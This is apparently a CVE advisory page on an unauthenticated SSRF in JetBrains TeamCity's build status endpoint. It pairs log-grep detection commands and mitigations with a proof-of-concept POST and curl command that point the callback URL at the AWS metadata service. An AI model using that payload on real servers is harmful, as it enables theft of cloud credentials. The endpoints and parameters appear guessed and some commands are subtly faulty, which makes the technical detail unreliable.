TeamCity (JetBrains TeamCity), SSRF (Server-Side Request Forgery), CVE-2026-49372 (Medium) -DC-Jun2026-95

Listen to this Post

How CVE-2026-49372 Works

CVE-2026-49372 is a vulnerability in JetBrains TeamCity that allows an unauthenticated attacker to perform Server-Side Request Forgery (SSRF) through the build status feature. The core of the issue lies in the build status reporting mechanism, which is designed to notify external systems (e.g., GitHub, GitLab, or custom webhooks) about the outcome of a build. This feature typically accepts parameters like buildId, status, or a callback URL to send the status report to.
In vulnerable versions of TeamCity (prior to 2026.1 and 2025.11.5), the server fails to properly validate or sanitize the URLs provided in these build status requests. An attacker can craft a malicious HTTP request to the build status endpoint, supplying a URL that points to an internal resource. When TeamCity processes this request, it will make an outbound HTTP request to the attacker-supplied URL, effectively allowing the attacker to “trick” the TeamCity server into making requests on their behalf.
The vulnerability is unauthenticated, meaning no valid TeamCity session or API token is required. This significantly lowers the barrier to exploitation. The attacker can use this SSRF primitive to:
1. Port Scan Internal Networks: By iterating through common ports (e.g., 22, 80, 443, 3306, 6379, 8080, 9200) on internal IP addresses, the attacker can discover which internal services are accessible. The TeamCity server’s response times or error messages can be used to infer if a port is open.
2. Access Internal Metadata APIs: A prime target for SSRF is the metadata service of cloud providers (e.g., AWS EC2 metadata at 169.254.169.254, Azure Instance Metadata Service, GCP metadata). Successful exploitation can lead to the theft of instance identity credentials, temporary IAM roles, and other secrets.
3. Interact with Internal Services: Depending on the network configuration, the attacker might be able to access internal admin panels, databases (e.g., Redis, Elasticsearch), or other CI/CD components that are not exposed to the public internet.
4. Read Local Files: In some configurations, using a `file://` protocol handler could allow the attacker to read local files from the TeamCity server, leading to information disclosure.
The root cause is the lack of proper validation of the callback URL in the build status feature. The fix involves implementing a strict allowlist of permitted target domains, validating the URL schema (e.g., disallowing file://), and potentially adding network-level controls to restrict outgoing requests. This vulnerability was patched in TeamCity versions 2026.1 and 2025.11.5.

DailyCVE Form

Platform: JetBrains TeamCity
Version: < 2026.1, < 2025.11.5
Vulnerability: Unauthenticated SSRF
Severity: Medium
Date: May 29, 2026

Prediction: June 15, 2026

What Undercode Say

The following analytics can be used to detect potential exploitation attempts of CVE-2026-49372.

Log Analysis (Access Logs)

Search for suspicious requests to the build status endpoint with abnormal URL parameters.

Search for requests to the build status endpoint with non-standard port numbers or IP addresses
grep -E "POST /buildStatus/.(port=|http://[0-9]+\.)" /var/log/teamcity/access.log
Look for requests containing "169.254.169.254" (AWS metadata service)
grep "169.254.169.254" /var/log/teamcity/access.log
Identify requests with "file://" protocol
grep "file://" /var/log/teamcity/access.log

Network Traffic Analysis

Monitor outbound HTTP requests from the TeamCity server for unexpected destinations.

Use tcpdump to capture outbound HTTP GET requests
sudo tcpdump -i eth0 'tcp port 80 and (tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420)'
Use netstat to view active outbound connections
netstat -tnp | grep -E 'teamcity|java' | grep ESTABLISHED

TeamCity Audit Logs

Check for failed or unusual build status submissions.

Search for errors related to build status publishing
grep -i "build status" /var/log/teamcity/teamcity-server.log | grep -i "error|exception"
Look for repeated failures from a single IP address
awk '/Build status/ {print $1}' /var/log/teamcity/teamcity-server.log | sort | uniq -c | sort -nr

Exploit: How to Exploit CVE-2026-49372

This proof-of-concept demonstrates how an unauthenticated attacker could use the build status feature to force the TeamCity server to make a request to an internal service.
1. Target Identification: Identify a vulnerable TeamCity instance (version < 2026.1 or < 2025.11.5). Common build status endpoints might include:
`http://teamcity.example.com/buildStatus/`
`http://teamcity.example.com/httpAuth/action.html?buildTypeId=…`
`http://teamcity.example.com/app/rest/builds//status`
2. Craft the Payload: Create a payload that instructs TeamCity to send a request to an internal resource. For this example, we’ll target the AWS metadata service.

POST /buildStatus/ HTTP/1.1
Host: teamcity.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
buildId=123&status=success&callbackUrl=http://169.254.169.254/latest/meta-data/

3. Launch the Attack: Send the malicious request using curl.

curl -X POST -d "buildId=123&status=success&callbackUrl=http://169.254.169.254/latest/meta-data/" http://teamcity.example.com/buildStatus/

If successful, TeamCity will fetch the metadata page. The response from the metadata service may be returned in the build status response (if the endpoint echoes back the result) or may be silently fetched, allowing for blind SSRF. The attacker could then use this to steal credentials or escalate access.

Protection: Mitigating CVE-2026-49372

Protecting against CVE-2026-49372 requires a multi-layered approach.

Immediate Patching (Most Effective):

Upgrade to version 2026.1 or 2025.11.5 immediately.

If an immediate upgrade is not possible, apply the security patch plugin provided by JetBrains.

Network-Level Mitigations (Defense in Depth):

Restrict Outbound Access: Implement strict egress filtering for the TeamCity server. Use a firewall or network policy to only allow outbound connections to known, trusted endpoints (e.g., your version control system, artifact repositories). Deny all connections to internal RFC 1918 IP addresses (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16).
Block Dangerous Protocols: Configure your egress proxy or firewall to block requests to protocols like file://, dict://, gopher://, and `ftp://`.
Segment the Network: Place the TeamCity server in a dedicated, isolated network segment with strict access controls. This limits the blast radius of any SSRF exploitation.

Application-Level Mitigations:

Implement URL Allowlist: If you cannot upgrade immediately, consider customizing the TeamCity configuration to enforce an allowlist of permitted callback URLs.
Disable Unused Features: If the build status feature is not required, disable it entirely or restrict access to it based on IP address.
Monitor and Alert: Implement logging and alerting for suspicious outbound requests from the TeamCity server, as described in the “What Undercode Say” section.

Impact: Potential Consequences of Exploitation

The successful exploitation of CVE-2026-49372 can have severe consequences for an organization, including:
Information Disclosure: Attackers can access sensitive internal services and metadata APIs, potentially exposing credentials, API keys, database passwords, and other secrets stored within the internal network.
Compromise of Internal Services: By forging requests, an attacker could interact with internal services (e.g., Redis, Elasticsearch, internal admin panels) to further their attack. This could lead to data modification, service disruption, or pivoting to other systems.
Cloud Account Takeover: Access to cloud metadata services (AWS, Azure, GCP) can provide the attacker with temporary credentials for the TeamCity server’s IAM role. Depending on the permissions attached to this role, an attacker could gain control over cloud resources, including the ability to spin up new instances, access storage buckets, or exfiltrate data.
Privilege Escalation: The SSRF can be used as a first step in a larger attack chain. For example, an attacker could force the TeamCity server to make a request to an internal service that is vulnerable to another exploit, leading to remote code execution on the TeamCity server itself. The CVSS vector contributed by other sources will likely reflect these possibilities. The attack probability is considered MEDIUM, indicating that exploitation is feasible.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top